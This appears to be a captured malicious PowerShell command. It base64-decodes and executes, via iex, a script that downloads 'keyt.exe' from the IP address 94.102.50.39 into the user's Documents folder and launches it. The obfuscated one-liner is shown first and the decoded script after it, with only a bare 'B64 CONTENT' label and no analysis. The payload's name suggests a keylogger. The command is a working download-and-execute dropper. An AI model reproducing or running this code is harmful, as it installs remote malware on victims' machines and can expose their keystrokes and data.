iex([sYstEm.texT.encODing]::utF8.GETStRIng([SySteM.cONveRT]::froMBASE64stRinG('CkltcG9ydC1Nb2R1bGUgQml0c1RyYW5zZmVyCiR3cmlqdmhuamZCYUhlZ1hQRlFmNkh2SUZkUTk5dnlTcUlVV2JSMUNtSFZPYWMxUUU4Q09qWlpqVGJHbE4xRng4dnRSQzhBdGhRaGV6TDRSV3dkV3l3SGx6Ym5Ea29GY1o1OTl5c2Rna0Eyb09ITVViU3RidkZ2Q2FnTEJhVzl6aE8wa3FsUk16ID0gW2Vudmlyb25tZW50XTo6Z2V0Zm9sZGVycGF0aCgibXlkb2N1bWVudHMiKQpTdGFydC1CaXRzVHJhbnNmZXIgLVNvdXJjZSAiaHR0cDovLzk0LjEwMi41MC4zOS9rZXl0LmV4ZSIgLURlc3RpbmF0aW9uICIkd3JpanZobmpmQmFIZWdYUEZRZjZIdklGZFE5OXZ5U3FJVVdiUjFDbUhWT2FjMVFFOENPalpaalRiR2xOMUZ4OHZ0UkM4QXRoUWhlekw0Uld3ZFd5d0hsemJuRGtvRmNaNTk5eXNkZ2tBMm9PSE1VYlN0YnZGdkNhZ0xCYVc5emhPMGtxbFJNelxrZXl0LmV4ZSIKSW52b2tlLUl0ZW0gICIkd3JpanZobmpmQmFIZWdYUEZRZjZIdklGZFE5OXZ5U3FJVVdiUjFDbUhWT2FjMVFFOENPalpaalRiR2xOMUZ4OHZ0UkM4QXRoUWhlekw0Uld3ZFd5d0hsemJuRGtvRmNaNTk5eXNkZ2tBMm9PSE1VYlN0YnZGdkNhZ0xCYVc5emhPMGtxbFJNelxrZXl0LmV4ZSIKCg==')));exit

##### B64 CONTENT #####


Import-Module BitsTransfer
$wrijvhnjfBaHegXPFQf6HvIFdQ99vySqIUWbR1CmHVOac1QE8COjZZjTbGlN1Fx8vtRC8AthQhezL4RWwdWywHlzbnDkoFcZ599ysdgkA2oOHMUbStbvFvCagLBaW9zhO0kqlRMz = [environment]::getfolderpath("mydocuments")
Start-BitsTransfer -Source "http://94.102.50.39/keyt.exe" -Destination "$wrijvhnjfBaHegXPFQf6HvIFdQ99vySqIUWbR1CmHVOac1QE8COjZZjTbGlN1Fx8vtRC8AthQhezL4RWwdWywHlzbnDkoFcZ599ysdgkA2oOHMUbStbvFvCagLBaW9zhO0kqlRMz\keyt.exe"
Invoke-Item  "$wrijvhnjfBaHegXPFQf6HvIFdQ99vySqIUWbR1CmHVOac1QE8COjZZjTbGlN1Fx8vtRC8AthQhezL4RWwdWywHlzbnDkoFcZ599ysdgkA2oOHMUbStbvFvCagLBaW9zhO0kqlRMz\keyt.exe"

